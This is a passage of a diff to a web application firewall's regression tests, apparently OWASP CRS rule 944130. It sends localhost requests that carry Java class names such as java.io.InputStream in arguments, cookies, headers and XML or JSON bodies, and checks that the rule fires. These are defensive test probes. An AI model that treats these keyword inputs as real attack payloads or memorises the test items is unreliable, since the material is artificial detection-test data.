"text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.io.FilterReader=test" - output: - log_contains: "id \"944130\"" - - test_title: 944130-135 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.io.FilterReader=test" + output: + log_contains: "id \"944130\"" + - test_id: 135 desc: "Cookie test includes keyword java.io.FilterReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=java.io.FilterReader - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-136 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=java.io.FilterReader + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_id: 136 desc: "Cookie name includes keyword java.io.FilterReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: java.io.FilterReader=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-137 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: java.io.FilterReader=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_id: 137 desc: "Request header test includes keyword java.io.FilterReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: java.io.FilterReader - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-138 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: java.io.FilterReader + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_id: 138 desc: "XML attribute value includes keyword java.io.FilterReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-139 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944130\"" + - test_id: 139 desc: "XML element value includes keyword java.io.FilterReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.io.FilterReader" - output: - log_contains: "id \"944130\"" - - test_title: 944130-140 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.io.FilterReader" + output: + log_contains: "id \"944130\"" + - test_id: 140 desc: "Nested XML element value includes keyword java.io.FilterReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.io.FilterReader" - output: - log_contains: "id \"944130\"" - - test_title: 944130-141 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.io.FilterReader" + output: + log_contains: "id \"944130\"" + - test_id: 141 desc: "Content-Type text/plain includes keyword java.io.FilterReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=java.io.FilterReader" - output: - log_contains: "id \"944130\"" - - test_title: 944130-142 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=java.io.FilterReader" + output: + log_contains: "id \"944130\"" + - test_id: 142 desc: "Content-Type application/json arg value includes keyword java.io.FilterReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"java.io.FilterReader\"}" - output: - log_contains: "id \"944130\"" - - test_title: 944130-143 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"java.io.FilterReader\"}" + output: + log_contains: "id \"944130\"" + - test_id: 143 desc: "Content-Type application/json arg name includes keyword java.io.FilterReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"java.io.FilterReader\": \"test\"}" - output: - log_contains: "id \"944130\"" - - test_title: 944130-144 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"java.io.FilterReader\": \"test\"}" + output: + log_contains: "id \"944130\"" + - test_id: 144 desc: "Argument test includes keyword java.io.InputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=java.io.InputStream" - output: - log_contains: "id \"944130\"" - - test_title: 944130-145 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=java.io.InputStream" + output: + log_contains: "id \"944130\"" + - test_id: 145 desc: "Argument name includes keyword java.io.InputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.io.InputStream=test" - output: - log_contains: "id \"944130\"" - - test_title: 944130-146 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.io.InputStream=test" + output: + log_contains: "id \"944130\"" + - test_id: 146 desc: "Cookie test includes keyword java.io.InputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=java.io.InputStream - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-147 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=java.io.InputStream + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_id: 147 desc: "Cookie name includes keyword java.io.InputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: java.io.InputStream=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-148 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: java.io.InputStream=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_id: 148 desc: "Request header test includes keyword java.io.InputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: java.io.InputStream - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-149 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: java.io.InputStream + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_id: 149 desc: "XML attribute value includes keyword java.io.InputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-150 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944130\"" + - test_id: 150 desc: "XML element value includes keyword java.io.InputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.io.InputStream" - output: - log_contains: "id \"944130\"" - - test_title: 944130-151 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.io.InputStream" + output: + log_contains: "id \"944130\"" + - test_id: 151 desc: "Nested XML element value includes keyword java.io.InputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.io.InputStream" - output: - log_contains: "id \"944130\"" - - test_title: 944130-152 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.io.InputStream" + output: + log_contains: "id \"944130\"" + - test_id: 152 desc: "Content-Type text/plain includes keyword java.io.InputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "text/plain" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=java.io.InputStream" - output: - log_contains: "id \"944130\"" - - test_title: 944130-153 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "text/plain" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=java.io.InputStream" + output: + log_contains: "id \"944130\"" + - test_id: 153 desc: "Content-Type application/json arg value includes keyword java.io.InputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"test\": \"java.io.InputStream\"}" - output: - log_contains: "id \"944130\"" - - test_title: 944130-154 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"test\": \"java.io.InputStream\"}" + output: + log_contains: "id \"944130\"" + - test_id: 154 desc: "Content-Type application/json arg name includes keyword java.io.InputStream" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/json" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "{\"java.io.InputStream\": \"test\"}" - output: - log_contains: "id \"944130\"" - - test_title: 944130-155 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/json" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "{\"java.io.InputStream\": \"test\"}" + output: + log_contains: "id \"944130\"" + - test_id: 155 desc: "Argument test includes keyword java.io.InputStreamReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=java.io.InputStreamReader" - output: - log_contains: "id \"944130\"" - - test_title: 944130-156 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=java.io.InputStreamReader" + output: + log_contains: "id \"944130\"" + - test_id: 156 desc: "Argument name includes keyword java.io.InputStreamReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.io.InputStreamReader=test" - output: - log_contains: "id \"944130\"" - - test_title: 944130-157 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.io.InputStreamReader=test" + output: + log_contains: "id \"944130\"" + - test_id: 157 desc: "Cookie test includes keyword java.io.InputStreamReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: test=java.io.InputStreamReader - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-158 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: test=java.io.InputStreamReader + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_id: 158 desc: "Cookie name includes keyword java.io.InputStreamReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - Cookie: java.io.InputStreamReader=test - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-159 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + Cookie: java.io.InputStreamReader=test + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_id: 159 desc: "Request header test includes keyword java.io.InputStreamReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/x-www-form-urlencoded" - test: java.io.InputStreamReader - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "test=value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-160 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/x-www-form-urlencoded" + test: java.io.InputStreamReader + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "test=value" + output: + log_contains: "id \"944130\"" + - test_id: 160 desc: "XML attribute value includes keyword java.io.InputStreamReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "element_value" - output: - log_contains: "id \"944130\"" - - test_title: 944130-161 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "element_value" + output: + log_contains: "id \"944130\"" + - test_id: 161 desc: "XML element value includes keyword java.io.InputStreamReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" - Accept-Encoding: "gzip,deflate" - Accept-Language: "en-us,en;q=0.5" - Content-Type: "application/xml" - method: "POST" - uri: "/post" - version: "HTTP/1.0" - data: "java.io.InputStreamReader" - output: - log_contains: "id \"944130\"" - - test_title: 944130-162 + - input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: "text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5" + Accept-Encoding: "gzip,deflate" + Accept-Language: "en-us,en;q=0.5" + Content-Type: "application/xml" + method: "POST" + uri: "/post" + version: "HTTP/1.0" + data: "java.io.InputStreamReader" + output: + log_contains: "id \"944130\"" + - test_id: 162 desc: "Nested XML element value includes keyword java.io.InputStreamReader" stages: - - stage: - input: - dest_addr: "127.0.0.1" - port: 80 - headers: - Host: "localhost" - User-Agent: "OWASP CRS test agent" - Accept: 